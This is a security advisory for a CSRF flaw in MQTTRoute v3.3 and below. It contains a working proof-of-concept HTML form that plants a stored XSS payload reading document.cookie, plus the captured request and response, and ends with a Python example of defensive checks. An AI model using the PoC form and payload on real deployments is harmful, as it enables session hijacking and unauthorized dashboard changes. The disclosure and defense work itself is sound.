CVE-2022-35611

A Cross-Site Request Forgery (CSRF) in MQTTRoute v3.3 and below allows attackers to create and remove dashboards.


The HTTP requests issued by the application carry no anti-CSRF tokens. As a result, an attacker can craft a malicious form which, when submitted by an unsuspecting user who holds a valid session, makes the server treat the request as one the user sent willingly.

Sample PoC form to create a dashboard:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<!-- opening form tag reconstructed from the captured request below: POST /bwiot/api/v1/dashboard/ on localhost:8080 -->
<form action="http://localhost:8080/bwiot/api/v1/dashboard/" method="POST">
  <input type="hidden" name="name" value="SC&lt;img&#32;src&#61;&#35;&#32;onerror&#61;alert&#40;document&#46;cookie&#41;&gt;" />
  <input type="hidden" name="desc" value="ADV" />
  <input type="submit" value="Submit request" />
</form>
</body>
</html>

An attacker can use CSRF to inject JavaScript as the dashboard name, granting the attacker access to the victim user's cookie, since the cookie is not marked HttpOnly.

Upon submitting the above form, the following request is sent to the server. Note that the request does not originate from http://localhost:8080, which shows that it is a cross-site (CSRF) request.

HTTP Request:

POST /bwiot/api/v1/dashboard/ HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 72
DNT: 1
Connection: close
Cookie: admin=177a54415aa44802851dcc4c04138c02
Upgrade-Insecure-Requests: 1

name=SC%3Cimg+src%3D%23+onerror%3Dalert%28document.cookie%29%3E&desc=ADV

HTTP Response:

HTTP/1.1 200 OK
Date: Fri, 01 Jul 2022 07:58:44 GMT
Server: TornadoServer/3.1
Content-Length: 135
Content-Type: application/json; charset=UTF-8

{"id": 6, "status": "Success", "description": "ADV", "name": "SC<img src=# onerror=alert(document.cookie)>", "time": 1656662324989.478}

The XSS popup appears as expected when the admin user visits the dashboard page.
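The three defects described above (no anti-CSRF token, a dashboard name stored and rendered unescaped, a session cookie without HttpOnly) can be closed at the request-handling layer. The following is an added example of such server-side checks, not MQTTRoute's own code: it assumes a per-session token submitted in a hypothetical `_xsrf` form field, an `EXPECTED_ORIGIN` of http://localhost:8080 taken from the captured request, and constructed sample headers for the cross-site PoC and for a legitimate submission.

```python
import hmac
import html
import secrets
from urllib.parse import parse_qs

# Origin the server considers its own; taken from the Host header in the captured request.
EXPECTED_ORIGIN = "http://localhost:8080"

# Constructed samples: the PoC body captured above, sent cross-site (browsers add an
# Origin header to cross-site form POSTs), and a legitimate same-origin submission.
POC_BODY = "name=SC%3Cimg+src%3D%23+onerror%3Dalert%28document.cookie%29%3E&desc=ADV"
POC_HEADERS = {"Host": "localhost:8080", "Origin": "http://attacker.example"}
LEGIT_HEADERS = {"Host": "localhost:8080", "Origin": "http://localhost:8080"}


def issue_csrf_token() -> str:
    """Per-session secret the server keeps and embeds in its own dashboard form."""
    return secrets.token_hex(16)


def is_same_origin(headers: dict) -> bool:
    """Accept only requests whose Origin (or Referer, if Origin is absent) is our own."""
    origin = headers.get("Origin") or headers.get("Referer")
    if origin is None:
        return False  # no provenance at all: treat as cross-site rather than trust it
    return origin == EXPECTED_ORIGIN or origin.startswith(EXPECTED_ORIGIN + "/")


def validate_dashboard_post(headers: dict, body: str, session_token: str) -> dict:
    """Return {'ok': True, 'name': ..., 'desc': ...} or {'ok': False, 'reason': ...}."""
    if not is_same_origin(headers):
        return {"ok": False, "reason": "cross-origin request"}
    form = {k: v[0] for k, v in parse_qs(body).items()}
    # Hypothetical field name '_xsrf'; constant-time compare. The PoC body carries no token.
    submitted = form.get("_xsrf", "")
    if not hmac.compare_digest(submitted.encode(), session_token.encode()):
        return {"ok": False, "reason": "missing or invalid anti-CSRF token"}
    # Escape before storage/rendering so the name can no longer carry a script into the page.
    return {"ok": True,
            "name": html.escape(form.get("name", "")),
            "desc": html.escape(form.get("desc", ""))}


def session_cookie_header(value: str) -> str:
    """Set-Cookie value that page scripts cannot read and browsers withhold cross-site."""
    return f"admin={value}; Path=/; HttpOnly; SameSite=Strict"


if __name__ == "__main__":
    token = issue_csrf_token()
    print(validate_dashboard_post(POC_HEADERS, POC_BODY, token))
    print(validate_dashboard_post(LEGIT_HEADERS, POC_BODY + "&_xsrf=" + token, token))
    print(session_cookie_header("<session-id>"))
```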
